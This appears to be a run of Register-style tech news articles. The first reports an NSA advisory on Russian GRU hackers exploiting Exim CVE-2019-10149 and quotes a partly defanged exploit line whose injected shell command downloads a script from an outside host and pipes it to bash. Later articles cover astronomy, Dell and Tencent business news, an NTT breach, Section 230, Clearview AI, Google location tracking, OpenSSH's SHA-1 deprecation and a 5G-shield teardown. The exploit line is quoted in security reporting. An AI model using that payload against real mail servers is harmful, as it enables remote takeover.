Here’s a sample of Moscow’s exploit code, according to the NSA, which is sent to a vulnerable server to hijack it – we’ve censored parts of it to avoid tripping any filters:

MAIL FROM:<${run{x2Fbinx2Fsht-
ctx22execx20x2Fusrx2Fbinx2Fwgetx20x2DOx20x2Dx20hxxp:x2Fx2Fhostapp.bex2Fscript1.shx20x7Cx20bashx22}}@hostapp.be>

That hexadecimal decodes to:
/bin/sh -c "exec /usr/bin/wget -O - hxxp://hostapp.be/script1.sh | bash"

“The Russian actors, part of the General Staff Main Intelligence Directorate’s (GRU) Main Center for Special Technologies (GTsST), have used this exploit to add privileged users, disable network security settings, execute additional scripts for further network exploitation; pretty much any attacker’s dream access – as long as that network is using an unpatched version of Exim MTA,” the NSA said.

In this case, miscreants, linked to the military-backed Sandworm operation, exploit improper validation of the recipient’s address in Exim’s deliver_message() function in /src/deliver.c to inject and execute a shell command, which downloads and runs another script to commandeer the server. An in-depth technical description of the programming blunder can be found here by Qualys, which found and reported the flaw last year.

Because Exim is widely used on millions of Linux and Unix servers for mail, bugs in the MTA are by nature public-facing and pose an attractive target for hackers of all nations.

The NSA did not say who exactly was being targeted, though we can imagine the Russian military takes an interest in probing foreign government agencies and vital industries. GRU hackers have also previously targeted energy utilities, by some reports.

The Sandworm hacking group has also previously been linked to attacks on a research lab in Britain, and the nation’s Foreign Office.

The exploit of CVE-2019-10149 by the Sandworm crew has been on-going since August, the NSA said. Fortunately, there has also been a fix out for this bug for nearly a year – the flaw was introduced in Exim 4.87 and patched back in June of 2019.

Updating Exim to version 4.93 or later will close off the vulnerability. While admins can download the update, using your Linux distro’s package manager will be the easiest way to get the fix, if for some reason you don’t already have it.

Admins are also advised to keep a close eye on their servers to check for suspicious activity, such as new accounts being added or security settings being changed.

“Routinely verifying no unauthorized system modifications, such as additional accounts and SSH keys, have occurred can help detect a compromise,” noted the NSA. “To detect these modifications, administrators can use file integrity monitoring software that alerts an administrator or blocks unauthorized changes on the system.

“If an MTA DMZ was configured in a least access model, for example to deny by default MTA initiated outbound traffic destined for port 80/443 on the internet while only permitting traffic initiated from an MTA to necessary hosts on port 80/443, the actors’ method of using CVE-2019-10149 would have been mitigated.” ®

Sponsored: Webcast: Ransomware has gone nuclear

Astronomers have finally found hard-to-detect visible matter scattered across space, left over from the Big Bang, after searching for nearly thirty years, according to a study published in Nature.

“We know from measurements of the Big Bang how much matter there was in the beginning of the Universe,” said Jean-Pierre Macquart, lead author of the paper and an associate professor at Curtin University, Australia, this week. “But when we looked out into the present universe, we couldn’t find half of what should be there. It was a bit of an embarrassment.”

Macquart isn’t referring to dark energy or dark matter. Instead, the study deals with baryonic matter, which is normal stuff made of protons and neutrons. The computer or device you’re using right now to read this is made up of it. This matter should also be out there in space, too, lingering between the galaxies and stars, but it’s missing, or rather, boffins couldn’t find it. The material is spread incredibly thinly across the void, making it difficult to detect.

But now scientists have managed to find some of that missing matter by inspecting fast radio bursts, which are powerful radio waves that are emitted for a few milliseconds. By following the line-of-sight of each blast, they were able to determine the electron column density, and count every baryon ionized by the electromagnetic wave.

“The radiation from fast radio bursts gets spread out by the missing matter in the same way that you see the colours of sunlight being separated in a prism,” Macquart said. “We’ve now been able to measure the distances to enough fast radio bursts to determine the density of the universe. We only needed six to find this missing matter.”

The density of missing matter they found was tiny; it’s equivalent to about “about one or two atoms in a room the size of an average office.” The measurement allows the academics to estimate the amount of missing matter in the universe.

The fast radio bursts were observed using the Australian Square Kilometre Array Pathfinder (ASKAP) telescope array at the Murchison Radio-astronomy Observatory located in Western Australia. “ASKAP both has a wide field of view, about 60 times the size of the full Moon, and can image in high resolution,” said Ryan Shannon, co-author of the paper and an associate professor at Swinburne University of Technology.

“This enables the precision to determine the location of the fast radio burst to the width of a human hair held 200m away,” he concluded. ®

Sponsored: Webcast: Simplify data protection on AWS

Dell has landed its first quarter for fiscal 2021 with a tiny dip in revenue compared to the same period last year, but warned that its usual seasonal revenue and profit surges probably won’t happen next quarter.

The company won $21.897bn of revenue for the three months to 1 May [PDF], compared to $21.908bn over the same period in FY 2020. Margin remained firm, as did expenses. Net income was $182m, a big year-on-year drop from $329m last time around.

The company was pleased with sales of PCs and the fact that customers turned to it as a one-stop shop they felt would be able to meet their needs as smaller rivals struggled to keep their supply chains intact during the COVID-19 pandemic. Margin on Q1 sales wasn’t always brilliant as Dell scrambled to get products into customers’ hands and transport costs rose.

Overall, infrastructure revenue fell 8 per cent.

Execs said they expect that the company’s usual revenue jump from Q1 to Q2 won’t happen this year and that increased component prices will also bite. Investment analysts were asked to consider future performance in light of global events, rather than Dell’s own weaknesses. Investors were also told that Dell’s cost control measures started in late March and therefore didn’t make much of an impact in this quarter, so measures taken to cope with the times will become more apparent on future balance sheets. Those numbers will not indicate any changes to the company’s previously planned debt reduction efforts, which for this year assume more than $5bn of Dell’s $36bn debt will be paid down.

The company remained optimistic that its product mix is right. Seventy per cent of sales reps reported deals in the pipeline for the company’s recently launched PowerStore appliances, which can run workloads as well as offer conventional storage services, demand that was mentioned as an example of Dell being able to make markets and drive demand.

And execs said they think the demand for Dell’s wares will be accelerated by the post-plague economic events. Dell’s strategy assumes that we’re through the first wave of corona-inspired action – rapid response to the crisis – and into a new phase of planning to do business amid new constraints. Dell reckons we’ll emerge into “an accelerated digital existence” in which so much activity shifts online that businesses will want to turn all the resulting data into “meaningful business insights” that can most easily be generated if businesses buy more Dell kit.

The company did not issue new guidance for future quarters or the full financial year, instead referring to analysts’ predictions that the infrastructure market will return to growth in 2021.

All of which sounds rather bleak, but compares rather well to direct rivals HPE (where revenue is down sharply and job cuts have been made) and Lenovo (where the data centre business is still struggling).

Dell, by contrast, thinks it has the product pipeline, bank balance and loyal customer base to do better. ®

Sponsored: Ransomware has gone nuclear

China’s Tencent, the owner of billion-member messaging app WeChat, has announced it will spend 500 billion yuan ($70bn) into new infrastructure over the next five years.

The spending plan, which was announced through the company’s official WeChat account (Chinese language), will focus on artificial intelligence, blockchain, IoT, 5G, and quantum computing. The investment will cover both capex and research and development.

Tencent will also use the investment to build a network of large-scale data centre that will house one million servers across the country.

That’s a fair slug of the global server market, which runs to about 12 million units a year. Over the five-year course of this plan Tencent would therefore account for about one-and-a-half percent of all server shipments.

The Shenzhen-based company needs all those servers because on top of WeChat it runs a colossal gaming business, video streaming services and a small-but-growing cloud. To house it all the company recently completed construction of a 51-hectare data centre complex in Guizhou province that will house tens of thousands of servers. The development includes more than 30,000 square meters of tunneling inside a hill, and a bomb shelter guarded by robots.

Tencent’s announcement comes after China’s Premier Li Keqiang called for an push into new infrastructure as part of the government work report delivered at the opening of China’s pseudo-parliament, the National People’s Congress, on Friday.

Alongside the call for investment, China’s government announced a stimulus package of 3.6 trillion yuan ($503bn) and issue one trillion yuan ($140bn) of special treasury bonds, the first time such a stimulus has been made since 2007. ®

Sponsored: Ransomware has gone nuclear

Global system integrator NTT has said someone hacked their way into its hosting and cloud services and may have accessed 600-odd customers’ data.

A Japanese-language statement that The Register has run through a pair of online translate-o-matic services says the service provider was infiltrated on May 7 via Active Directory services running in its Singapore operations. The intrusion was confirmed on May 11. The Active Directory deployment was accessed remotely and then used internally as a stepping stone to other systems.

While a production server that ultimately came under attack was quickly triaged and the service provider quickly cut off its communications links, the hacker had managed to gain a toehold in an information management server, and reach into the company’s Japanese hosting and cloud services.

621 customers of those services were then within reach of the intruder, creating “a possibility that some information was leaked due to suspicious access.”

NTT said it’s hardened up since learning of the hack, which it thinks was made possible by an insecure migration project. It is now working with the impacted customers and will reveal as much as it can about the attack without breaching (what remains of) its customers’ confidentiality.

As with any cyber-break-in, this one is embarrassing. But as outsourcers’ whole schtick is giving clients a comfortable ride, hacks like this one belie their value proposition. ®

Sponsored: Webcast: Ransomware has gone nuclear

Analysis Following a fit of indignation at Twitter’s decision to apply a fact check notice to some of his recent Twitter messages, US President Donald Trump on Thursday signed an executive order that purports to limit the liability protection afforded to internet platforms when they take action on user posts.

But the nonsensical order doesn’t really do much at all. As Eric Goldman, law professor at Santa Clara University, put it in a phone interview with The Register, “It’s political theater.”

The President read a statement summarizing the order during a signing event at the White House.

“Currently social media giants like Twitter receive an unprecedented liability shield based on the theory that they’re a neutral platform – which they are not – not an editor with a viewpoint,” Trump said.

“My executive order calls for new regulations under Section 230 of the Communications Decency Act to make it that social media companies that engage in censoring or any political conduct will not be able to keep their liability shield. That’s a big deal.”

The Communications Decent Act Section gives internet platforms blanket legal protections concerning the content posted by others on, or through, their services. Websites that are mere conduits can’t, generally speaking, be held responsible for what’s shared by their users.

Section 230 of the law says: “No provider or user of an interactive computer service shall be treated as the publisher or speaker of any information provided by another information content provider.”

But websites don’t have to be dumb conduits in order to be shielded from lawsuits: the law allows for editorial intervention under subparagraph (c)(2)(A) for material that is “obscene, lewd, lascivious, filthy, excessively violent, harassing, or otherwise objectionable, whether or not such material is constitutionally protected.”

So when Twitter adds a fact checking notification to Trump’s tweets, as it did for the first time on Tuesday, it can do without taking on editorial liability if it believes the material is objectionable, whether it’s protected speech or not.

Trump’s executive order says, “When an interactive computer service provider removes or restricts access to content and its actions do not meet the criteria of subparagraph (c)(2)(A), it is engaged in editorial conduct.”

But the allowable criteria for intervention are broad enough that it’s difficult to see how a service provider could take action on content in a way that does not meet the specified criteria.

And, what’s more, Section 230 tackles user-generated content; fact-checking notes added by Twitter itself, as it did with Trump, should fall outside these rules, anyway.

Big government is bad, except when it’s not

The executive order also calls for the Secretary of Commerce, the US Attorney General, and the National Telecommunications and Information Administration (NTIA) to ask the Federal Communications Commission (FCC) to propose rules that clarify the interplay between Section 230 immunity and allowable editorial intervention. The FCC is an odd choice seeing as it cannot regulate websites.

And the order calls for government agencies to review federal spending on advertising and marketing paid to online platforms. Also, it directs the Attorney General to work with the states to enforce their own laws against deceptive business practices.

“This executive order is egregiously excessive with clearly malevolent intent to suppress free speech,” said US Senator Richard Blumenthal (D-CT), via Twitter. “It is a blatant attempt to use the full power of the United States government to force private companies to lie for the President.”

Twitter itself branded the order “reactionary and politicized,” in a tweet:

This EO is a reactionary and politicized approach to a landmark law. #Section230 protects American innovation and freedom of expression, and it’s underpinned by democratic values. Attempts to unilaterally erode it threaten the future of online speech and Internet freedoms.

— Twitter Public Policy (@Policy) May 29, 2020

Harvard law professor Lawrence Tribe was similarly dismissive. “Nothing the President or agencies like the FCC and FTC can legally do could successfully censor such private internet comment, so the executive order that Trump has unfurled is a big nothingburger in terms of responding to what Twitter did to provoke Trump’s outrage,” he said, via Twitter.

Taking the bait

The Electronic Frontier Foundation in a blog post said the order won’t survive judicial scrutiny.

EFF staff attorney Aaron Mackey, in a phone interview with The Register, said the executive order is legally nothing in the sense that Trump can’t rewrite the law. But, he said, that doesn’t mean it will be inconsequential.

“This is a clear effort to retaliate and attack online platforms and intimidate them and deter them from making decisions about content,” he said.

While the executive order doesn’t really change anything, Mackey suggested, policies or actions taken subsequently by the administration to realize the goals articulated in the order may cause problems.

Goldman said it’s important to recognize the real audience for this order: Trump’s political campaign donors, and, we imagine, his conservative base. “It’s his way of showing he’s sticking it to the powers that be,” Goldman said.

“He doesn’t care if it does anything. Trump has already won even if he didn’t change the law one bit because he dominated the news cycle and we all took the bait.”

On Wednesday, coincidentally, the US officially surpassed 100,000 COVID-19 deaths, according to Johns Hopkins University, meaning, if all figures are to be believed, America is home to 28 per cent of global coronavirus deaths and four per cent of the world’s population.

And more than 40 million people in the States have claimed unemployment benefits during the pandemic. ®

Updated to add

Overnight, Twitter hid a Trump tweet, posted amid civil unrest in Minneapolis and elsewhere over the killing of George Floyd by a police officer, that said the US military should open fire on people on American soil. The tweet “violated the Twitter Rules about glorifying violence,” according to the social network.

PS: The President’s executive order targets social media platforms, including Twitter, YouTube, and Facebook. Even after Mark Zuckerberg kissed up to the President, Facebook was still hit by the order. Sad, as one would say.

Sponsored: Ransomware has gone nuclear

The American Civil Liberties Union has sued Clearview AI for scraping billions of photos from public social media profiles, without people’s explicit consent, to train its facial-recognition system.

The lawsuit [PDF], filed on Thursday at the Circuit Court of Cook County, Illinois, claims Clearview violated the state’s stringent Biometric Information Privacy Act (BIPA). Companies operating in Illinois must obtain explicit consent from individuals if they collect their biometric data, whether it’s in the form of fingerprints or photographs.

“Clearview has violated and continues to violate the BIPA rights of Plaintiffs’ members, clients, and program participants and other Illinois residents at staggering scale,” the lawsuit claimed.

“Using face recognition technology, Clearview has captured more than three billion faceprints from images available online, all without the knowledge – much less the consent – of those pictured.”

Clearview, a startup based in New York, made headlines in January when it was revealed to have amassed a database of three billion images by downloading people’s pictures from public pages on sites like Facebook, YouTube, Venmo, Instagram, and Twitter.

The dataset was used to train facial recognition algorithms, so that when images, say from a CCTV camera, are fed into Clearview’s system, the code looks for a match, and if one is found, it spits out everything it knows about that person: their harvested photos, and the URLs to the source pages that typically contain more personal information, such as names and contact details. This allows Clearview’s customers to turn faces in security camera footage stills into complete personal profiles, for example.

Initially, CEO Hoan Thon That said his upstart’s software was only intended for cops and government agents. But a hacker broke into Clearview’s systems and revealed its customer list, which contained US household staples such as Macy’s, Walmart, Wells Fargo, and Bank of America, and some universities.

Various groups joined the ACLU in its lawsuit against Clearview, including non-profits and social justice organizations that support sex workers and the Latinx population in Illinois. The union described the upstart’s technology as “unlawful, privacy-destroying surveillance.”

“Given the immutability of our biometric information and the difficulty of completely hiding our faces in public, face recognition poses severe risks to our security and privacy,” the ACLU said in its lawsuit.

“The capture and storage of faceprints leaves people vulnerable to data breaches and identity theft. It can also lead to unwanted tracking and invasive surveillance by making it possible to instantaneously identify everyone at a protest or political rally, a house of worship, a domestic violence shelter, an Alcoholics Anonymous meeting, and more.

“And, because the common link is an individual’s face, a faceprint can also be used to aggregate countless additional facts about them, gathered from social media and professional profiles, photos posted by others, and government IDs.”

Tech companies have also tried to thwart Clearview’s slurping of photos. In February, Google, YouTube, Twitter, and Facebook all served the startup cease-and-desist letters ordering it to stop stealing images from their platforms, and to delete existing pics in its massive database.

“For far too long tech companies have misused our most sensitive data while facing too little consequence,” said Abraham Scarr, director at the Illinois Public Interest Research Group, a nonprofit organization that’s also suing Clearview alongside the ACLU.

“The BIPA is unique in that it allows Illinois residents to control not only their biometric information, but also the laws governing its use, putting the power back into the hands of the people.”

Clearview’s lawyer Tor Ekeland told The Register: “Clearview AI is a search engine that uses only publicly available images accessible on the internet. It is absurd that the ACLU wants to censor which search engines people can use to access public information on the internet. The First Amendment forbids this.” ®

Sponsored: Webcast: Ransomware has gone nuclear

Arizona Attorney General Mark Brnovich on Wednesday filed a lawsuit against Google, claiming the ad biz employs unfair and deceptive trade practices to collect location data from mobile phones.

The complaint, brought under the US state’s Consumer Fraud Act in Maricopa County Superior Court, seeks to stop Google from harvesting people’s whereabouts without consent, and to recover millions of dollars in ad revenue associated with Arizona residents.

“While Google users are led to believe they can opt-out of location tracking, the company exploits other avenues to invade personal privacy,” said Attorney General Mark Brnovich, in a statement. “It’s nearly impossible to stop Google from tracking your movements without your knowledge or consent.”

The lawsuit [PDF] is based on an Associated Press report from 2018 that revealed Google gathered location data from mobile devices even when its Location History service had been disabled, through other settings. Those revelations prompted civil lawsuits in other states and led lawmakers to direct the Federal Trade Commission to look into Google’s practices.

Honestly, the FTC isn’t likely to do much. To date, the trade watchdog’s fines of large tech companies have been too small to cause any financial damage. Even last year’s record $5bn fine levied against Facebook only amounted to a month of revenue for the company and managed to increase its share price.

Arizona’s complaint, the result of a two-year-investigation, incorporates extensive testimony from Google employees. However, the court filing is heavily redacted because Google wants its privacy.

“Our complaint cites extensive testimony from Google employees given under oath and contains nearly 100 additional exhibits, including internal documents that were obtained from Google over the course of our investigation,” a spokesperson for the Arizona Attorney General’s Office said in an email to The Register.

“The public version of the filing redacts certain information that Google has asserted is confidential. We will be seeking to make more information public consistent with applicable court rules.”

Google, in an emailed statement, suggested the legal challenge is motivated by profit-seeking attorneys. “The Attorney General and the contingency fee lawyers filing this lawsuit appear to have mischaracterized our services,” a spokesperson said.

“We have always built privacy features into our products and provided robust controls for location data. We look forward to setting the record straight.”

It’s not the robustness of the controls that is at issue; rather it’s the complexity of multiple controls interacting with one another that concerns Arizona. The array of device-level, account-level, and app-level location data controls “misleads and deceives users of Google’s products into believing that they are not sharing location information when they actually are,” the complaint says.

The lawsuit contends not only that Google used deceptive methods to collect location data but also that the ad biz used location data even when people had enabled settings to prevent the use of location data.

“Google provides an account-level toggle in a user’s Google Account under ‘Data & Personalization,’ the complaint says. “Such a toggle implies that the user has control over whether Google will serve ads based on the user’s location. But …”

The remainder of the explanation is redacted, as is much of the rest of the complaint. The legal filing does note, however, that Google was uncooperative with investigators and generally failed to comply with the AG’s discovery demands. ®

Sponsored: Ransomware has gone nuclear

Updated The maintainers of OpenSSH, the widely used toolkit for connecting securely to servers and devices over networks, have warned that the SHA-1 algorithm will be disabled in a “near-future release”.

SHA stands for Secure Hash Algorithm. The SHA-1 implementation has been known to be vulnerable since 2005 though still requiring reassuringly non-trivial amounts of computation to break. More powerful attacks have been developed since, and compute resources have become cheaper, so the vulnerability gradually increases.

The OpenSSH decision references a recent paper [PDF] by Gaëtan Leurent and Thomas Peyrin, titled “SHA-1 is a Shambles,” showing that a “chosen-prefix collision” can be achieved for $45,000 – more than a casual amount, but “within the means of academic researchers.”

A chosen-prefix collision means it’s possible to modify data – be it a file or information in transit – in such a way that both the previous and tampered versions have the same SHA-1 hash value. Thus, security checks relying on verifying data integrity from SHA-1 hashes can be fooled.

“It is now possible to perform chosen-prefix attacks against the SHA-1 algorithm for less than USD$50K. For this reason, we will be disabling the ‘ssh-rsa’ public key signature algorithm by default in a near-future release,” said OpenSSH maintainer Damien Miller in the release notes for OpenSSH 8.3, echoing similar comments from the 8.2 release notes back in February.

The OpenSSH team suggest users and administrators use alternative, more secure hashing algorithms including SHA-2 (supported since OpenSSH 7.2 four years ago) or the even older ssh-ed25519 or ECDSA (Elliptic Curve Digital Signature Algorithm) as proposed in 2009. Another suggestion is to use the UpdateHostKeys setting in OpenSSH clients, which automatically updates the client’s knowledge of the keys identifying the server and the algorithm used, as explained by Miller here in 2015.

These statements have caused some confusion concerning matters such as whether keys will have to be regenerated, and what will happen with hardware tokens or network devices with out-of-date firmware. It is important to distinguish between keys and hash algorithms.

“OpenSSH’s advisory was worded very confusingly, but the way it works is that ssh-rsa *keys* can be used with both the ssh-rsa *algorithm* and the rsa-sha2-256 *algorithm*. If both sides support the latter then there is no SHA-1 in use,” said security consultant Hector Martin on Twitter.

Removal of SHA-1 support in OpenSSH will still be significant. “This algorithm is unfortunately still used widely despite the existence of better alternatives,” said Miller, and it seems that actually removing support is the only way to prevent its use.

Essentially, if a device or client can support something better than SHA-1 that’s also supported by OpenSSH, all will be well; if it’s hardwired to SHA-1, action is needed to connect to an OpenSSH server that no longer supports the algorithm.

Alan Woodward, professor of cybersecurity at the University of Surrey in England, told The Register that “SHA-1 is no longer secure but actually it is still fairly difficult to crack,” which is true, but equally the fact that it has been known to be flawed for over a decade and remains in wide use shows how slow the industry is to move.

The cost of cracking SHA-1 will continue to fall, so now is the time to stop using it. ®

Updated to add

We asked Miller for clarification of the impact of removing SHA-1 support.

“A ssh-rsa key does not need to be regenerated to be useful with the updated signature algorithms,” he told us. “Specifically, an existing ssh-rsa key is perfectly usable with the rsa-sha2-256 or rsa-sha2-512 algorithms.”

What about old devices that use SHA-1? “We’re talking about changing the default set of enabled algorithms and not removing ssh-rsa support entirely (at least not yet). So no devices will be completely unusable, at worst they will require an extra command-line argument or a couple of lines of configuration. There are some examples of this at openssh.com/legacy.html.

“Devices that do not support the RFC8332 RSA/SHA-2 signature methods, and do not support any of the other, more modern key types, will need that extra step. Otherwise ssh will refuse to connect. These more-modern key types that I mentioned include the ECDSA keys defined in RFC5656 that was published over ten years ago. If users’ devices are newer than this then I think it’s quite legitimate for them to ask their vendors why they weren’t shipping modern cryptography in their products.”

Sponsored: Webcast: Ransomware has gone nuclear

A £339 “anti-5G” product billed as the “first to market full-spectrum protection” appears to be nothing more than a bog-standard £5 USB stick with an LED on the end, according to Pen Test Partners.

The “quantum” USB stick, branded as the “5GBioShield”, is a “proprietary holographic nano-layer catalyst technology” and a “remediation from all harmful radiation, electro-smog and biohazard pollution”.

The nano-layer – a bubble, we are assured by marketing material – has an operating diameter of either 8 or 40 metres. The USB is “resulting from research of several decades in multiple countries”.

It was dismantled by PTP, whose teardown and analysis showed the device contained nothing more than a 128MB USB storage drive and an LED. Oh, and a circular black sticker.

The “quantum” stick comes pre-loaded with a 25-page PDF of marketing from the website, including a Q&A of distances of the “bubble” and ways to ascertain if it is working.

“It’s an ‘always on’ system apparently, is always working, powered or not, so no visual checks needed,” said PTP.

A full teardown of the item found “no electrical or other connections between the device and the ‘sticker’ and also no additional components other than the USB stick,” PTP’s Phil Eveleigh wrote.

“In our opinion the 5G Bioshield is nothing more than a £5 USB key with a sticker on it. Whether or not the sticker provides £300 worth of quantum holographic catalyser technology, we’ll leave you to decide.

“We do not believe this product should be promoted by publicly-funded bodies until a full, independent, peer-reviewed scientific study has been undertaken on its effectiveness. We think trading standards bodies should investigate this product.”

The product comes amid a heightened state of paranoia among many people across society that the building of 5G masts is somehow linked to cancer, a weak immune system, infertility, bad sleep, or more lately COVID-19. As Reg readers will know, it isn’t. There is no evidence of this.

Anna Grochowalska, one of the two directors of the company selling the £339 USB sticks, BioShield Distribution Ltd, told the BBC in response to the obvious question about what made the item so expensive: “We are in possession of a great deal of technical information, with plenty of back-up historical research.

“As you can understand, we are not authorised to fully disclose all this sensitive information to third parties, for obvious reasons.”

The Reg asked Grochowalska to comment. She does not manufacture or own the device but told the Beeb she has sole rights to distribute it. ®

Sponsored: Practical tips for Office 365 tenant-to-tenant migration